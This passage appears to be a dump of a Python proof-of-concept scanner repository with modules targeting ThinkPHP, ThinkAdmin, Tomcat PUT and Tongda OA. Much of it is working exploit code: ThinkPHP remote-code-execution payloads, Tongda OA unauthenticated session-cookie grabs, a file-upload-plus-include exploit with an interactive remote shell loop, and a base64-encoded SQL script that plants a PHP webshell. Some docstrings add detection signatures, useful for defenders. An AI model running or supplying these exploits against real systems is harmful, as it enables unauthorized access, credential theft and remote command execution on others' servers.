    if 'schema' in parameter:
        schema = parameter['schema']
        if 'format' in schema:
            return schema['format']
        if 'type' in schema:
            return schema['type']
        if '$ref' in schema:
            ref = schema['$ref'].replace('#/definitions/', '')
            return '{OBJECT_%s}' % ref
    return parameter['type'] if 'type' in parameter else 'unkonwn'


def process_doc(url):
    """Walk one Swagger 2.0 document and call scan_api() for every GET/POST/PUT operation.

    base_url is rebuilt from the module-level `scheme` plus the document's
    host and basePath. Parameters are rendered as name=<placeholder>, with
    '*' wrapped around the placeholder of optional ones, and any parameter
    whose name contains url/path/uri is reported as possibly interesting.
    Any error aborts the whole document with a printed message.
    """
    sensitive_words = ['url', 'path', 'uri']
    try:
        json_doc = requests.get(url, headers=headers, verify=False).json()
        base_url = (scheme + '://' + json_doc['host'] + json_doc['basePath']).rstrip('/')
        for path, operations in json_doc['paths'].items():
            for method, operation in operations.items():
                if method.upper() not in ['GET', 'POST', 'PUT']:
                    continue

                pieces = []
                sensitive_params = []
                if 'parameters' in operation:
                    for parameter in operation['parameters']:
                        para_name = parameter['name']
                        # mark sensitive param (once per parameter)
                        if any(para_name.lower().find(word) >= 0 for word in sensitive_words):
                            sensitive_params.append(para_name)
                        placeholder = _param_placeholder(parameter)
                        is_required = '' if parameter['required'] else '*'
                        pieces.append('%s=%s%s%s' % (para_name, is_required, placeholder, is_required))
                params_str = '&'.join(pieces)
                if sensitive_params:
                    print_msg('[*] Possible vulnerable param found: %s, path is %s' % (
                        sensitive_params, base_url + path), 'green')

                scan_api(method, base_url, path, params_str)
    except Exception as e:
        print_msg('[process_doc error][%s] %s' % (url, e))
93 |
94 |
def scan_api(method, base_url, path, params_str, error_code=None):
    """Send one request for a documented operation and print a request/response summary.

    Args:
        method: HTTP method from the document; only GET is sent as GET —
            every other value (POST and also PUT) goes through requests.post.
        base_url: scheme://host/basePath built by process_doc().
        path: operation path.
        params_str: name=placeholder pairs from process_doc(); the typed
            placeholders are replaced with sample values below.
        error_code: None on the first attempt. When the first reply is 401
            or 403 the function calls itself once with error_code set and
            `path` prefixed by an extra '/'; a reply to that retry that is
            anything other than 401/403 is reported as '[VUL] *** URL Auth
            Bypass ***' and auth_bypass_detected is set.

    Operations whose URL contains 'delete' are skipped. No timeout is set on
    either request and TLS verification is off. Note that the bypass verdict
    accepts any non-401/403 status, including 404 and 500, so it can
    false-positive; the commented-out condition below is an earlier, stricter
    attempt.
    """
    # place holder
    _params_str = params_str.replace('*string*', 'a')
    _params_str = _params_str.replace('*int64*', '1')
    _params_str = _params_str.replace('*int32*', '1')
    _params_str = _params_str.replace('=string', '=test')
    _params_str = _params_str.replace('*number*', '1')
    _params_str = _params_str.replace('*date-time*', '20211104')
    _params_str = _params_str.replace('*boolean*', 'false')

    api_url = base_url + path
    # URL blacklist: skip anything that looks destructive
    sensitive_url = ['delete']
    for url in sensitive_url:
        if api_url.lower().find(url) >= 0:
            print_msg('[Continue] %s' % (api_url))
            return
    if not error_code:
        print_msg('[%s] %s %s' % (method.upper(), api_url, params_str))
    if method.upper() == 'GET':
        r = requests.get(api_url + '?' + _params_str, headers=headers, verify=False)
        if not error_code:
            if r.status_code == 200:
                print_msg('[Request] %s %s' % (method.upper(), api_url + '?' + _params_str), 'green')
            else:
                print_msg('[Request] %s %s' % (method.upper(), api_url + '?' + _params_str), 'red')
    else:
        # PUT operations also end up here and are sent as POST.
        r = requests.post(api_url, data=_params_str, headers=headers, verify=False)
        if not error_code:
            if r.status_code == 200:
                print_msg('[Request] %s %s \n%s' % (method.upper(), api_url, _params_str), 'green')
            else:
                print_msg('[Request] %s %s \n%s' % (method.upper(), api_url, _params_str), 'red')

    content_type = r.headers['content-type'] if 'content-type' in r.headers else ''
    content_length = r.headers['content-length'] if 'content-length' in r.headers else ''
    if not content_length:
        content_length = len(r.content)
    if not error_code:
        print_msg('[Response] Code: %s Content-Type: %s Content-Length: %s' % (
            r.status_code, content_type, content_length))
    else:
        # This is the retried request: anything other than 401/403 counts as a bypass.
        #if r.status_code not in [401, 403, 500] or r.status_code != error_code:
        if r.status_code not in [401, 403]:
            global auth_bypass_detected
            auth_bypass_detected = True
            print_msg('[VUL] *** URL Auth Bypass ***')
            if method.upper() == 'GET':
                print_msg('[BypassRequest] [%s] %s Code: %s' % (method.upper(), api_url + '?' + _params_str, r.status_code), 'blue')
            else:
                print_msg('[BypassRequest] [%s] %s \n%s Code: %s' % (method.upper(), api_url, _params_str, r.status_code), 'blue')

    # Auth Bypass Test, 401,403 bypass: retry exactly once with the path prefixed by '/'.
    if not error_code and r.status_code in [401, 403]:
        path = '/' + path
        scan_api(method, base_url, path, params_str, error_code=r.status_code)
151 |
152 |
# Usage hint emitted as a side effect of importing this module.
print('[*]', '请输入api-docs.json地址, 将自动对所有接口进行测试!!!')
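def check(**kwargs):
    """Framework entry point: discover API documents from kwargs['url'] and scan each one.

    Resets the module state (api_set_list and scheme) on every call, and
    prints errors that escape the helpers instead of discarding them.
    Returns None.
    """
    global scheme
    api_set_list.clear()
    try:
        _scheme = urlparse(kwargs['url']).scheme.lower()
        # Reset on every call: the original only ever switched to 'https'
        # and never back, so a later http target was scanned with an https
        # base URL.
        scheme = 'https' if _scheme == 'https' else 'http'
        find_all_api_set(kwargs['url'])
        for url in api_set_list:
            process_doc(url)
    except Exception as e:
        # Was `pass`; a malformed URL now leaves a trace in the output.
        print_msg('[check error] %s' % e)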
167 |
168 |
--------------------------------------------------------------------------------
/POC/TPscan.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding=utf-8
3 | from plugins.thinkphp_checkcode_time_sqli import thinkphp_checkcode_time_sqli_verify
4 | from plugins.thinkphp_construct_code_exec import thinkphp_construct_code_exec_verify
5 | from plugins.thinkphp_construct_debug_rce import thinkphp_construct_debug_rce_verify
6 | from plugins.thinkphp_debug_index_ids_sqli import thinkphp_debug_index_ids_sqli_verify
7 | from plugins.thinkphp_driver_display_rce import thinkphp_driver_display_rce_verify
8 | from plugins.thinkphp_index_construct_rce import thinkphp_index_construct_rce_verify
9 | from plugins.thinkphp_index_showid_rce import thinkphp_index_showid_rce_verify
10 | from plugins.thinkphp_invoke_func_code_exec import thinkphp_invoke_func_code_exec_verify
11 | from plugins.thinkphp_lite_code_exec import thinkphp_lite_code_exec_verify
12 | from plugins.thinkphp_method_filter_code_exec import thinkphp_method_filter_code_exec_verify
13 | from plugins.thinkphp_multi_sql_leak import thinkphp_multi_sql_leak_verify
14 | from plugins.thinkphp_pay_orderid_sqli import thinkphp_pay_orderid_sqli_verify
15 | from plugins.thinkphp_request_input_rce import thinkphp_request_input_rce_verify
16 | from plugins.thinkphp_view_recent_xff_sqli import thinkphp_view_recent_xff_sqli_verify
17 | import time,requests
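# Raw string: the banner's trailing backslashes were line continuations in the
# original non-raw literal (joining two pairs of lines) and its other '\'
# sequences are invalid escapes that warn on recent interpreters.
print(r'''
___________
|_ _| ___ \
| | | |_/ /__ ___ __ _ _ __
| | | __/ __|/ __/ _` | '_ \
| | | | \__ \ (_| (_| | | | |
\_/ \_| |___/\___\__,_|_| |_|
code by Lucifer
''')
print("用法:http://example.com/{index.php}不需要index.php")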
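def check(**kwargs):
    """Run every ThinkPHP plugin verifier against kwargs['url'], 0.5 s apart.

    The verifiers run in the original order; the first exception raised by
    any of them stops the remaining ones and is printed. Returns None.
    """
    url = kwargs['url']
    # The original created a requests.session() (with keep_alive=False) that
    # was never passed to anything; that dead object is gone.
    verifiers = (
        thinkphp_checkcode_time_sqli_verify,
        thinkphp_construct_code_exec_verify,
        thinkphp_construct_debug_rce_verify,
        thinkphp_debug_index_ids_sqli_verify,
        thinkphp_driver_display_rce_verify,
        thinkphp_index_construct_rce_verify,
        thinkphp_index_showid_rce_verify,
        thinkphp_invoke_func_code_exec_verify,
        thinkphp_lite_code_exec_verify,
        thinkphp_method_filter_code_exec_verify,
        thinkphp_multi_sql_leak_verify,
        thinkphp_pay_orderid_sqli_verify,
        thinkphp_request_input_rce_verify,
        thinkphp_view_recent_xff_sqli_verify,
    )
    try:
        for index, verify in enumerate(verifiers):
            if index:
                # Pause between probes, as in the original sequence.
                time.sleep(0.5)
            verify(url)
    except Exception as e:
        print("异常对象内容%s"%e)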
--------------------------------------------------------------------------------
/POC/ThinkAdmin.py:
--------------------------------------------------------------------------------
1 | import requests,sys
2 |
def check(**kwargs):
    """Check kwargs['url'] for the ThinkAdmin unauthenticated file-listing endpoint.

    POSTs rules=["/"] to admin.html?s=admin/api.Update/node (no timeout,
    default TLS verification). A 200 response containing the success marker
    prints '[+]' and returns 1; otherwise None is returned.
    """
    url = kwargs['url']
    u = url+"/admin.html?s=admin/api.Update/node"
    data = {'rules':'["/"]'}
    r = requests.post(u,data=data)
    # NOTE(review): indentation was lost in this listing; the `else` is
    # reconstructed as belonging to the marker check, so a non-200 response
    # prints nothing. Confirm against the original file.
    if r.status_code == 200:
        if "获取文件列表成功" in r.text:
            print("[+] %s 存在未授权列目录" % url)
            return 1
        else:
            print("[-] %s 不存在漏洞" %url)
            return
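if __name__ == "__main__":
    # `poc` was never defined in this file, so running it as a script raised
    # NameError; the module's entry point is check(**kwargs).
    if len(sys.argv) == 2:
        check(url=sys.argv[1])
    else:
        print("Usage: python poc.py http://127.0.0.1")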
20 |
--------------------------------------------------------------------------------
/POC/ThinkphpVersion.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | from ClassCongregation import color
3 | import requests
4 | import re
5 |
# Usage hint emitted as a side effect of importing this module.
print("用法:" + "http://example.com/{index.php}可选")
# Query strings appended to the target; check() stops at the first one whose
# response looks like ThinkPHP.
pathdict = ['?s=index2/index/index', '?s=index/index/index']
11 |
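def check(**kwargs):
    """Fingerprint ThinkPHP on kwargs['url'] and report the version string.

    For each query in pathdict one GET is sent; a body that mentions
    ThinkPHP or one of its Chinese error strings counts as a hit. The
    version is taken from the first x.y.z match of the form [356].[012].NN
    ('?.?.?' when absent) and the site title from a second GET of the bare
    URL ('?.?.?' on failure, as in the original). Returns 'ThinkPHP V<ver>'
    on a hit, 'None' otherwise; request errors are printed per path.
    """
    url = kwargs['url'].strip('/')
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0',
        'Connection': 'close',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',}
    for path in pathdict:
        try:
            r = requests.get(url + path, headers=headers, timeout=5, verify=False)
            if (re.findall('ThinkPHP', r.text, flags=re.IGNORECASE)) or ('系统发生错误' in r.text) or ('无法载入模组' in r.text):
                match = re.search(r'([356]\.)([012]\.)(\d{1,2})', r.text)
                version = match.group() if match else '?.?.?'
                try:
                    r_title = requests.get(url, headers=headers, timeout=5, verify=False)
                    # NOTE(review): the tag names around (.+) were lost in the
                    # listing (an unterminated string there was a SyntaxError);
                    # restored as the HTML <title> element — confirm against
                    # the original source.
                    title = "".join(re.findall(r'<title>(.+)</title>', r_title.text))
                except Exception:
                    title = '?.?.?'

                color('[+] ThinkPHP V%s | '%version + url +' | '+title, 'green')
                return 'ThinkPHP V'+version
        except Exception:
            color('[-] Request error | ' + url + path, 'red')
    color('[-] No ThinkPHP | ' + url, 'red')
    return 'None'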
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
--------------------------------------------------------------------------------
/POC/Thinkphp_5_0_23_rce.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | import random,sys
3 |
4 | #from lib.Requests import Requests
5 | import requests
vuln = ['ThinkPHP', 'ThinkSNS']
# Eight distinct digits drawn from 0-8 (range(0, 9) never yields 9): a marker
# that is unlikely to appear in a normal response body by chance.
random_num = ''.join(map(str, random.sample(range(0, 9), 8)))

print('thinkphp v5.x 远程代码执行漏洞-POC集合:https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection')
print("用法:http://example.com/{index.php}不需要index.php")
def check(**kwargs):
    """Probe kwargs['url'] for the ThinkPHP 5.0.23 code-execution issue.

    One POST is sent to /index.php?s=captcha with a form body that asks the
    framework to echo the random marker from the module level; a vulnerable
    host returns that marker in the body. Returns 1 on a match, None
    otherwise; request errors are printed. No timeout is set and TLS
    verification is off. Detection: a POST to the captcha route whose body
    carries `_method=__construct` is the request shape to alert on.
    """
    url = kwargs['url']
    # Sent as a pre-encoded form string (data=str), not as a dict.
    payload = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num)
    try:
        headers = {'Content-Type': 'application/x-www-form-urlencoded'}
        r = requests.post(url + '/index.php?s=captcha', data=payload, headers=headers, verify=False)
        if random_num in r.text:
            print('[+]thinkphp_5_0_23_rce | ' + url)
            return 1
        else:
            print('[-]target is not vulnerable')
            return
    except Exception as e:
        print("异常对象的内容是%s"%e)
26 |
27 |
--------------------------------------------------------------------------------
/POC/Thinkphp_5_rce_1.py:
--------------------------------------------------------------------------------
1 | # coding=utf-8
2 | #from lib.Requests import Requests
3 | import requests
4 |
# Usage hint emitted as a side effect of importing this module.
print("用法:" + "http://example.com/{index.php}不需要index.php")
def check(**kwargs):
    """Probe kwargs['url'] for the ThinkPHP 5 invokefunction code-execution issue.

    One GET asks the framework's invokefunction route to call phpinfo; the
    hit is confirmed only when phpinfo's own markers ('PHP Version' or
    'PHP Extension Build') appear in the body. Returns 1 when confirmed,
    None otherwise; request errors are printed. No timeout is set and TLS
    verification is off. Detection: a request path containing
    `invokefunction` together with `function=call_user_func_array` is the
    signature to alert on.
    """
    url = kwargs['url']
    payload = r"/index.php/?s=/index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
    try:
        r = requests.get(url + payload, verify=False)
        if ('PHP Version' in r.text) or ('PHP Extension Build' in r.text):
            print('thinkphp5_rce_1 | ' + url)
            return 1
        else:
            print('target is not vulnerable')
            return
    except Exception as e:
        print("异常对象的内容是%s"%e)
20 |
--------------------------------------------------------------------------------
/POC/Tomcat_http_put.py:
--------------------------------------------------------------------------------
1 | import requests
2 | import random
3 |
4 |
def put(url):
    """Check whether the server accepts HTTP PUT by uploading a random .txt file.

    A 201 response means the server created /<random>.txt; nothing here
    removes it afterwards, so a successful check leaves a file behind.
    Prints the verdict and returns None. No timeout is set and TLS
    verification is off.
    """
    url = url.strip('/')
    text = random.randint(100000000, 200000000)
    payload = '/{}.txt'.format(text)
    url = url + payload
    # Small form body: the random number as both key and value.
    data = {'{}'.format(text): '{}'.format(text)}
    header = {"user-agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"}
    r = requests.put(url, data=data, allow_redirects=False, verify=False, headers=header)
    if r.status_code == 201:
        print('[+]HTTP METHOD PUT url: {}'.format(url))
    else:
        print('[-]target is not vulnerable')
17 |
# Usage hint emitted as a side effect of importing this module.
print('[*]Usage:', '[URL]')
def check(url):
    """Entry point for put().

    Takes a single positional `url`, unlike the sibling modules' **kwargs
    form; presumably the caller passes exactly one url argument — verify
    against the dispatcher.
    """
    return put(url)
21 |
--------------------------------------------------------------------------------
/POC/Tongda_cookie_11_4.py:
--------------------------------------------------------------------------------
1 | '''
2 | @Author : Sp4ce
3 | @Date : 2020-03-17 23:42:16
4 | @LastEditors : Sp4ce
5 | @LastEditTime : 2020-04-22 16:24:52
6 | @Description : Challenge Everything.
7 | '''
8 | import requests
9 | from random import choice
10 | import json
11 |
# Pool of User-Agent strings; getV11Session()/get2017Session() pick one at
# random before each request.
USER_AGENTS = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
    "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
]

# Shared request headers, mutated in place by the two helpers below.
headers={}
20 |
def getV11Session(url):
    """Try the Tongda OA v11 login-code flow to obtain a session without credentials.

    POSTs UID=1 to /logincheck_code.php with a random User-Agent. A JSON
    reply with status 1 is treated as success: the Set-Cookie header is
    printed and 1 is returned. Any other reply prints the server's msg (if
    present) and returns None; exceptions (including a missing Set-Cookie
    header or non-JSON body) are printed and also return None.
    Detection: an unauthenticated POST to /logincheck_code.php carrying only
    a UID field is the request shape to alert on.
    """
    checkUrl = url+'/general/login_code.php'  # built but never used in this function
    try:
        headers["User-Agent"] = choice(USER_AGENTS)  # mutates the module-level dict
        getSessUrl = url+'/logincheck_code.php'
        res = requests.post(
            getSessUrl, data={ 'UID': int(1)},headers=headers, verify=False)
        resText = json.loads(res.text)
        status = resText['status']
        if str(status) == str(1):

            print('[+]V11 version Get Available Cookie:'+res.headers['Set-Cookie'])
            print('[+]访问{}/general'.format(url))
            return 1
        else:
            if resText['msg']:
                print('服务器返回:{}'.format(resText['msg']))
            return
    except Exception as e:
        print("异常对象的内容是%s"%e)
        return
44 |
45 |
def get2017Session(url):
    """Try the Tongda OA 2017 QR-login flow to obtain a session without credentials.

    Three requests: GET /ispirit/login_code.php for a codeuid, POST it to
    /general/login_code_scan.php with uid=1/username=admin/type=confirm,
    and — when that reply has status 1 — GET
    /ispirit/login_code_check.php?codeuid=<codeuid> (sent without the
    custom headers) and print its Set-Cookie header. Returns 1 on success,
    None otherwise; exceptions are printed and return None.
    """
    checkUrl = url+'/ispirit/login_code.php'
    try:
        headers["User-Agent"] = choice(USER_AGENTS)  # mutates the module-level dict
        res = requests.get(checkUrl,headers=headers, verify=False)
        resText = json.loads(res.text)
        codeUid = resText['codeuid'] # codeuid returned by the server
        codeScanUrl = url+'/general/login_code_scan.php'
        res = requests.post(codeScanUrl, data={'codeuid': codeUid, 'uid': int(
            1), 'source': 'pc', 'type': 'confirm', 'username': 'admin'},headers=headers, verify=False)
        resText = json.loads(res.text)
        status = resText['status']
        if str(status) == str(1):
            getCodeUidUrl = url+'/ispirit/login_code_check.php?codeuid='+codeUid # revisit with the codeuid
            res = requests.get(getCodeUidUrl, verify=False)
            print('[+]Get Available Cookie:'+res.headers['Set-Cookie']) # the session arrives in Set-Cookie
            return 1
        else:
            print('[-]Something Wrong With '+url + ' Maybe Not Vulnerable')
            return
    except Exception as e:
        print("异常对象的内容是%s"%e)
68 |
# Usage hint emitted as a side effect of importing this module.
print('[*]Usage:', '[URL]')
def check(**kwargs):
    """Framework entry point: try the v11 flow first, then the 2017 flow.

    Returns 1 from whichever helper succeeds first; otherwise the result of
    get2017Session (None).
    """
    url = kwargs['url']
    return getV11Session(url) or get2017Session(url)
--------------------------------------------------------------------------------
/POC/Tongda_rce_11_4.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # -*- encoding: utf-8 -*-
3 | '''
4 | @File : tongda_rce.py
5 | @Time : 2020/03/18 11:59:48
6 | @Author : fuhei
7 | @Version : 1.0
8 | @Blog : http://www.lovei.org
9 | '''
10 |
11 | import requests
12 | import re
13 | import sys
14 |
# Usage hint emitted as a side effect of importing this module.
print('[*]Usage:', '[URL]')
def check(**kwargs):
    """Two-step probe of kwargs['url'] for the Tongda OA 11.4 upload/include issue.

    Step 1 POSTs a multipart body (field ATTACHMENT, file name f.jpg, plus
    P/DEST_UID/UPLOAD_MODE fields) to /ispirit/im/upload.php and reads the
    `2003_<name>|` token from the reply. Step 2 POSTs to
    /ispirit/interface/gateway.php a `json` field whose `url` value path-
    traverses to the uploaded file and `f=echo fffhhh`; a 200 reply that
    contains 'fffhhh' is the vulnerable verdict and the upload name is
    returned (command() reuses it). Otherwise None is returned; exceptions
    are printed. The uploaded file is not removed afterwards.
    Detection: a POST to gateway.php whose json.url contains '../' is the
    request shape to alert on.
    """
    url = kwargs['url']

    try:
        url1 = url + '/ispirit/im/upload.php'
        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "multipart/form-data; boundary=---------------------------27723940316706158781839860668"}
        data = "-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"ATTACHMENT\"; filename=\"f.jpg\"\r\nContent-Type: image/jpeg\r\n\r\nexec(\"cmd /c \".$command);\r\n$stdout = $exec->StdOut();\r\n$stroutput = $stdout->ReadAll();\r\necho $stroutput;\r\n?>\n\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"P\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"DEST_UID\"\r\n\r\n1222222\r\n-----------------------------27723940316706158781839860668\r\nContent-Disposition: form-data; name=\"UPLOAD_MODE\"\r\n\r\n1\r\n-----------------------------27723940316706158781839860668--\r\n"
        result = requests.post(url1, headers=headers, data=data, verify=False)

        # Non-raw pattern: '\|' is an invalid escape that warns on recent interpreters.
        name = "".join(re.findall("2003_(.+?)\|",result.text))
        url2 = url + '/ispirit/interface/gateway.php'
        headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
        data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "echo fffhhh"}
        result = requests.post(url2, headers=headers, data=data, verify=False)
        if result.status_code == 200 and 'fffhhh' in result.text:
            # print("[+] Remote code execution vulnerability exists at the target address")
            print("[+]Server is vulnerable")
            return name
        else:
            print("[-]Server is not vulnerable")
            return
    except Exception as e:
        print("异常对象的内容是%s"%e)
39 |
40 | def command(url, name,command="whoami"):
41 | url = url + '/ispirit/interface/gateway.php'
42 | headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Forwarded-For": "127.0.0.1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"}
43 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "%s" % command}
44 | result = requests.post(url, headers=headers, data=data, verify=False)
45 | while(1):
46 | command = input("fuhei@shell$ ")
47 | if command == 'exit' or command == 'quit':
48 | break
49 | else:
50 | data = {"json": "{\"url\":\"../../../general/../attach/im/2003/%s.f.jpg\"}" % (name), "f": "%s" % command}
51 | result = requests.post(url, headers=headers, data=data, verify=False)
52 | print(result.text)
53 |
54 |
55 | if __name__ == '__main__':
56 | url = sys.argv[1]
57 | name = check(url)
58 | if name:
59 | print("[+] Remote code execution vulnerability exists at the target address")
60 | command(url,name)
61 | else:
62 | print("[-] There is no remote code execution vulnerability in the target address")
63 |
64 |
65 |
--------------------------------------------------------------------------------
/POC/Tongda_v11_4_rce_getshell.py:
--------------------------------------------------------------------------------
1 | #! /usr/bin/env python3
2 | # -*- coding: utf-8 -*-
3 |
4 | '''
5 | @ 已测试通过版本: v11.4
6 | @ https://www.github.com/zrools/tools/python
7 | @ 修改 oa_addr 后: python3 tongda_v11.4_rce_exp.py
8 | '''
9 |
10 | import requests, base64, re
11 |
# One session shared by login()/get_path()/upload_file(): it carries the
# authentication cookies from login() into the later requests.
session = requests.Session()

# Default target.  check() rebinds this module-level global from kwargs['url'],
# so every helper reads whatever the most recent check() call set.
oa_addr = 'http://192.168.0.3:8080'

# NOTE(review): login() and upload_file() alias this dict (login_headers = headers,
# upload_headers = headers) and then assign keys into the alias, so these
# "defaults" are mutated in place — Content-Type / X-Requested-With values
# accumulate across calls instead of staying constant.
headers = {
'Accept-Encoding' : 'gzip, deflate',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'
}
20 |
21 |
22 | def login():
23 | login_url = '{}/logincheck_code.php'.format(oa_addr)
24 | login_code_url = '{}/general/login_code.php?codeuid=1'.format(oa_addr)
25 |
26 | login_headers = headers
27 | login_headers['X-Requested-With'] = 'XMLHttpRequest'
28 | login_headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
29 |
30 | res = session.get(login_code_url)
31 | code_uid = res.text.strip()[-40:-2]
32 |
33 | login_data = 'UID=1&CODEUID={}'.format(code_uid)
34 |
35 | res = session.post(login_url, data=login_data, headers=login_headers)
36 |
37 | if '"status":1' in res.text:
38 | return True
39 |
40 | return False
41 |
42 |
43 | def upload_file(web_path):
44 | upload_url = '{}/general/system/database/sql.php'.format(oa_addr)
45 |
46 | upload_data = base64.b64decode( 'LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMDc0OTk3Njg4MjE0NjY5MjYzOTIwNTI0OTEzNjINCkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic3FsX2ZpbGUiOyBmaWxlbmFtZT0iZXhwLnNxbCINCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC1zcWwNCg0Kc2V0IGdsb2JhbCBnZW5lcmFsX2xvZz0nb24nOwpzZXQgZ2xvYmFsIGdlbmVyYWxfbG9nX2ZpbGU9J01ZT0FfV0VCU0hFTEwnOwpzZWxlY3QgIjw/cGhwICRjb21tYW5kPSRfR0VUWydjbWQnXTskd3NoID0gbmV3IENPTSgnV1NjcmlwdC5zaGVsbCcpOyRleGVjID0gJHdzaC0+ZXhlYygnY21kIC9jICcuJGNvbW1hbmQpOyAkc3Rkb3V0ID0gJGV4ZWMtPlN0ZE91dCgpOyAkc3Ryb3V0cHV0ID0gJHN0ZG91dC0+UmVhZEFsbCgpO2VjaG8gJHN0cm91dHB1dDs/PiI7CnNldCBnbG9iYWwgZ2VuZXJhbF9sb2c9J29mZic7Cg0KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0yMDc0OTk3Njg4MjE0NjY5MjYzOTIwNTI0OTEzNjItLQ==')
47 |
48 | #upload_data = base64.b64decode('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')
49 |
50 | shell_path = '{}\\\\api\\\\test.php'.format(web_path)
51 | upload_data = upload_data.decode('utf8').replace('MYOA_WEBSHELL', shell_path).encode('utf8')
52 |
53 | upload_headers = headers
54 | upload_headers['Content-Type'] = 'multipart/form-data; boundary=---------------------------207499768821466926392052491362'
55 |
56 | res = session.post(upload_url, data=upload_data, headers=upload_headers)
57 |
58 | webshell = ''
59 |
60 | if '数据库脚本导入完成' in res.text:
61 | webshell = '{}/api/test.php?cmd=ipconfig'.format(oa_addr)
62 |
63 | return webshell
64 |
65 |
66 | def get_path():
67 | url = '{}/general/system/security/service.php'.format(oa_addr)
68 |
69 | res = session.get(url, headers=headers)
70 |
71 | web_path = ''
72 | # 避免正则报错
73 | for i in res.text.split("\n"):
74 | if 'WEBROOT' in i:
75 | web_path = i.split('"')[-4]
76 |
77 | return web_path.replace('\\', '\\\\')
78 |
79 |
def check(**kwargs):
    """Framework entry point: run login() -> get_path() -> upload_file() against kwargs['url'].

    Returns True when upload_file() reported a result URL, None otherwise
    (login failure, empty web root, upload not confirmed, or any exception).
    Side effect: rebinds the module-level ``oa_addr`` that every helper reads,
    so successive calls are not independent of each other.
    """

    try:

        global oa_addr
        oa_addr = kwargs['url']
        if not login():
            print('login failed.')
            return None

        web_path = get_path()
        print('webroot: ', web_path)

        # NOTE(review): this prints the live session cookies to stdout.  Anything
        # that captures the tool's output (console transcripts, CI logs) then
        # holds a reusable credential for the target; consider not echoing them.
        cookies = ';'.join([k + '=' + v for k, v in session.cookies.items()])
        print('cookies: ', cookies)

        if web_path:
            webshell = upload_file(web_path)
            if webshell:
                print('webshell: (GET) {}'.format(webshell))
                return True

        print('getshell failed.')
        return None
    except Exception as e:
        # NOTE(review): every exception — connection refused, timeout, a KeyError
        # from a missing 'url' kwarg — is reported with the same "target is not
        # vulnerable" line and ``e`` is never shown, so transport errors are
        # indistinguishable from genuine negatives.
        print('%s 目标不存在漏洞'%oa_addr)
106 |
107 |
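if __name__ == '__main__':
    import sys

    # The target used to be a hard-coded public IP:port literal right here,
    # which made the script's target implicit and trivially easy to run
    # against the wrong host.  Require it on the command line instead; the
    # check() call itself is unchanged.
    if len(sys.argv) != 2:
        print('usage: {} <oa_addr, e.g. http://host:port>'.format(sys.argv[0]))
        sys.exit(1)
    check(url=sys.argv[1])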
--------------------------------------------------------------------------------
/POC/URL_getTitle.py:
--------------------------------------------------------------------------------
1 | from requests.packages import urllib3
2 | from util.ExpRequest import ExpRequest,Output
3 | urllib3.disable_warnings()
4 |
def check(**kwargs):
    """Fetch kwargs['url'] once and return the page title ExpRequest extracted.

